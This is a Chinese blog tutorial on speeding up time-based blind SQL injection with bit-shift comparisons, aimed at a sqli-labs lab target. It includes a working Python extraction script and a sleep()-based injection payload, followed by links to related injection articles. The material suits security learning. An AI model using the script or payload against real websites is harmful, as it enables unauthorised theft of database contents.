利用位运算符号提高延时注入效率

最新推荐文章于 2024-11-03 20:27:08 发布
最新推荐文章于 2024-11-03 20:27:08 发布
阅读量198 收藏
点赞数 2
文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44747030/article/details/131156146
版权

利用位运算符号提高延时注入效率

前置知识

右移位运算符是将一个二进制数按指定移动的位数向右移动。右位移: 将一个运算对象的各二进制位全部右移若干位, 正数左补0, 负数左补1, 右边多余的位数去掉; 右移 1 位相当于除 2, 右移 n 位相当于除 2 的 n 次方.如下例所示:

MariaDB [test]> select ascii(b'01110011');
ERROR 2006 (HY000): Server has gone away
No connection. Trying to reconnect...
Connection id:    32
Current database: test

+--------------------+
| ascii(b'01110011') |
+--------------------+
|                115 |
+--------------------+
1 row in set (0.007 sec)

MariaDB [test]> select ascii(b'01110011') >> 1;
+-------------------------+
| ascii(b'01110011') >> 1 |
+-------------------------+
|                      57 |
+-------------------------+
1 row in set (0.000 sec)

MariaDB [test]> select ascii(b'01110011') >> 7;
+-------------------------+
| ascii(b'01110011') >> 7 |
+-------------------------+
|                       0 |
+-------------------------+
1 row in set (0.000 sec)

MariaDB [test]> select ascii(b'01110011') >> 6;
+-------------------------+
| ascii(b'01110011') >> 6 |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.000 sec)

MariaDB [test]> select ascii(b'01110011') >> 5;
+-------------------------+
| ascii(b'01110011') >> 5 |
+-------------------------+
|                       3 |
+-------------------------+
1 row in set (0.000 sec)

MariaDB [test]> select ascii(b'01110011') >> 0;
+-------------------------+
| ascii(b'01110011') >> 0 |
+-------------------------+
|                     115 |
+-------------------------+
1 row in set (0.000 sec)

利用这种方式,我们可以将单个的字符,先转换成ascii,在转换成二进制位,通过右位移的方式来对每个二进制位进行比较0或者1,通过8次的对比就可以获取到相应的二进制位,在通过二进制位计算出ascii值并转换成字符既可以得到相应的结果。

# -*- coding:utf-8 -*-

import requests
import time

def bitOperation(url,delay):
    result = ""  # 存储获取的查询结果
    url_bak = url
    # 外层循环由查询结果字符的长度控制,内层循环即为固定的7次位运算
    for len in range(1, 777):  # 此处长度可控,也可以不做判断直接给一个很长的数字
        char = '0'  # 设置当前字符的ascii码二进制的第一位默认为0,因为是正数
        for i in range(7, -1,-1):
            url = url.format(len, i, int(char + '0', 2))  # int(char + '0', 2) 解释为二进制表示,并将其转换为对应的整数。表示假设其第二位为0,若相等即条件为真,否则为假
            start_time = time.time()  # 记录请求开始时间
            r1 = requests.get(url)  # 发送第一个请求
            end_time = time.time()  # 记录请求结束时间
            elapsed_time = end_time - start_time  # 计算请求延时时间

            if elapsed_time > delay:
                char += '0'
                print('进入0:', char)
            else:
                char += '1'
                print('进入1:', char)
            url = url_bak
        # 二进制转换成十进制,也就是ascii码(chr() 函数将该整数视为 ASCII 码值,并将其转换为对应的字符),再将ascii码转换成字符累加到result变量上
        result += chr(int(char, 2))
        print(result)
        if int(char, 2) == 0:  # 不再作判断长度, 当ascii码为00000000时自动退出(多发7个请求)
            print("已超过此次查询字符串的长度,自动停止")
            return result
        if int(char, 2) == 127: # ascii最多127个,127为del
            print("查询内容不存在或语法错误...")
            return result
    return result


def main():
    url = "http://192.168.91.129/Less-5/?id=1' and (select if ((ascii((substr(database(),{},1))) >> {} )={} ,sleep(3), 'false'))-- -"
    delay = 2
    bitOperation(url,delay)


if __name__ == "__main__":
    main()

在这里插入图片描述

参考文章:

https://xz.aliyun.com/t/9302#toc-3

https://www.exploit-db.com/papers/17073

https://xz.aliyun.com/t/3054

evilxpl
关注
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
mysql10种报错注入,SQL注入
weixin_39738273的博客
03-23 310
转自:https://wywwzjj.top/2018/11/02/Sqli-labs-通关记录/#函数报错信息注入MySQL 常用语句备忘-- Default DatabasesmysqlRequires root privilegesinformation_schemaAvailable from version 5 and higherComment Out Query# /**/ -- -...
SQL注入
qq_39480875的博客
05-22 254
转自:https://wywwzjj.top/2018/11/02/Sqli-labs-通关记录/#函数报错信息注入 MySQL 常用语句备忘 -- Default Databases mysql Requires root privileges information_schema Available from version 5 and higher Comment Out Que...
SQL注入全详解
重庆森林不在重庆的博客
10-08 1143
为探讨清楚SQL注入的诸多细节,作者将自己对自己的学习过程进行了全面、详细、系统的总结。本文是经由sqli-labs训练总结而来,配合作者的sqli-labs通关全详解食用更佳(怎么可以光学习不训练呢)。
渗透测试-注入攻击专题
aming小老弟
03-11 3847
sql手工注入 @apache+php+Mysql 正则注入 0x01 Mysql 手工注入 1.1 联合注入 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0' union sele
SQL注入类型
01-27 6175
SQL注入类型详解 SQL 注入是指web应用程序对用户输入数据控制不严格,导致用户输入数据被拼接到SQL语句中被数据库执行导致的安全问题,按照注入方式可以分为联合注入、布尔盲注、时间盲注、堆叠注入以及报错注入等五种注入方式。在sql注入时影响返回单行的不仅仅是sql 语句的问题,有时是代码层面的问题。 判断注入是否存在 and 1=1,and 1=2 返回页面数据不同 ?id=3-1,返回数据内容不同 添加’、""以及其他特殊符报错 联合注入 前提要求:数据会进行回显,页面有显位符,在一个在
sql注入总结--详细
weixin_44576725的博客
11-19 6712
文章目录SQL注入总结1、原理2、数据库基础系统函数字符串连接函数mysql注释符union 操作符的介绍order by介绍字符串编码数据库结构导入导出相关操作增删改函数3、判断是否存在SQL注入4、回显注入(联合注入)查询字段数目查询库名查询表名查询字段名查询字段值获取WebShell5、盲注sql注入截取字符串常用函数REGEXP正则表达式LIKE 匹配布尔盲注布尔盲注的流程脚本时间盲注DNSLog盲注6、堆叠注入7、报错注入数据溢出xpath语法错误主键重复一些特性8、二次注入9、ORDER BY
SQL 注入漏洞
2301_82218779的博客
05-30 1639
什么是 SQL 注入SQL 注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行 SQL 查询时插入恶意的 SQL 代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库危害。
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
freeking101的博客
07-03 8407
SQL 注入 SQL注入就是通过把 SQL 命令插入到 Web表单提交 或 输入域名 或 页面URL请求查询的字符串,最终达到欺骗服务器执行恶意的 SQL命令,假如管理员没有对 id 参数进行过滤那么黑客可以通过数据传输点将恶意的SQL语句带入查询。 sqlmap sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据
Web系统常见安全漏洞介绍及解决方案-sql注入
web15286201346的博客
07-31 949
使用ORM框架对sql注入是有积极意义的,在实际解决SQL注入时,还有一个难点就是应用复杂后,代码数量庞大,难以把可能存在sql注入的地方不遗漏的找出来,而ORM框架为我们发现问题提供了一个便捷的途径。这个探测方法有若干变体,例如,发送';例如,如果应用程序根据用户的输入(如用户名和密码)来查询用户帐户的数据库表,以认证用户,而攻击者能够将恶意数据注入查询的用户名部分(和/或密码部分),查询便可能更改成完全不同的数据复制查询,可能是修改数据库的查询,或在数据库服务器上运行Shell命令的查询。...
Redis框架从入门到学精(全)
热门推荐
码农研究僧的博客
07-02 2万+
目录前言1.NoSQL2.Redis2.1 软件安装数据类型 前言 解决功能新问题:JAVA jsp rdsms tomcat html linux jdbc svn 解决发展性问题:strtus spring springmvc hibernate mybatis 解决性能问题:NOSQL java 线程 hadoop nginx mq elasticsearch 1.NoSQL NoSQL特点 非关系型数据库,不依赖业务逻辑数据库存储,以简单key-value存储 适用于 ~高并发读写 ~海量数据读
NISP
极光时流
07-21 2865
NISP七月份练习01 文章目录NISP七月份练习01NISP七月份练习02NISP七月份练习03NISP七月份练习04NISP七月份练习05NISP七月份练习06NISP七月份练习07NISP七月份练习08NISP七月份练习09NISP七月份练习10NISP七月份练习11NISP七月份练习12NISP七月份练习13NISP七月份练习14NISP七月份练习15NISP七月份练习16NISP七月份练习17NISP七月份练习18 1我国的( )主要规定了关于数据电文、电子签名与认证及相关的法律责任 A.《中华人
Day21包和模块
weixin_50199478的博客
10-30 612
一个.py文件就是一个模块。模块是含有一系列数据、函数、类等的程序。包是将模块以文件夹的组织形式进行分组管理的方法,以便更好地组织和管理相关模块。包是一个包含一个特殊的__init__.py文件的目录。
01_IAR新建CC2530工程
nanxl1的博客
11-02 896
由于很多Zigbee商家提供的教程未有从零建立CC2530工程的讲解,可能会导致后面的开发中出现一些琐碎的问题。本文将以**LED流水灯**为例,从0到1用**IAR**建立CC2530工程。
cleanfid库的fid使用,及其使用CLIP模型clip_vit_b_32计算FID
百年孤独百年的博客
11-02 776
这篇博客详细介绍了如何使用 cleanfid 库计算 Fréchet Inception Distance (FID),特别是利用 CLIP 模型 clip_vit_b_32 计算 FID 分数来评估生成图像的质量。内容涵盖了 FID 的概念和原理、cleanfid 库的安装与配置、从缓存中加载与手动加载模型的方法,以及解决可能遇到的依赖问题。通过这篇教程,可以掌握使用 cleanfid 库计算fid的完整流程,并能够解决服务器环境中遇到的联网与模型下载问题。
Backtrader 数据篇 02
进击的小学生
10-30 1004
重新自定义数据读取函数,自定义的方式就是继承数据加载类 GenericCSVData、PandasData 再构建一个新的类,然后在新的类里统一设置参数。如果传递负值(例如:-1),则表示 CSV 数据中不存在该字段自定义的函数,不会修改 Backtrader 底层的数据表格内 lines 的排列规则。
变量与数据类型:从整数到字符串
redrose2100的博客
10-30 78
变量是用于存储数据的命名空间。在Python中,定义变量非常简单,你只需要将一个值赋给变量名即可。# 定义变量x = 10变量名只能包含字母、数字和下划线(_)。变量名不能以数字开头。变量名不能为Python的关键字(如ifelsewhile等)。# 合法的变量名age = 25# 非法的变量名# 1st_num = 10 # 不能以数字开头# if = "condition" # 不能使用Python关键字。
【2024-10-31-2024-11-03】LeetCode刷题——python语法基础题
最新发布
tan_run的博客
11-03 210
【2024-10-31-2024-11-03】LeetCode刷题——python语法基础题 交替合并字符串,移动零,罗马字符转整数,反转链表
利用TDR技术提升传输延时测量精度
时域反射计在传输延时测量中的应用为电力系统带来了更科学、更准确的测试手段,提升了远动系统实时数据传输的可靠性和效率,对于电力系统监控系统的建设和维护具有重要意义。随着技术的发展,TDR将在更多领域得到...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值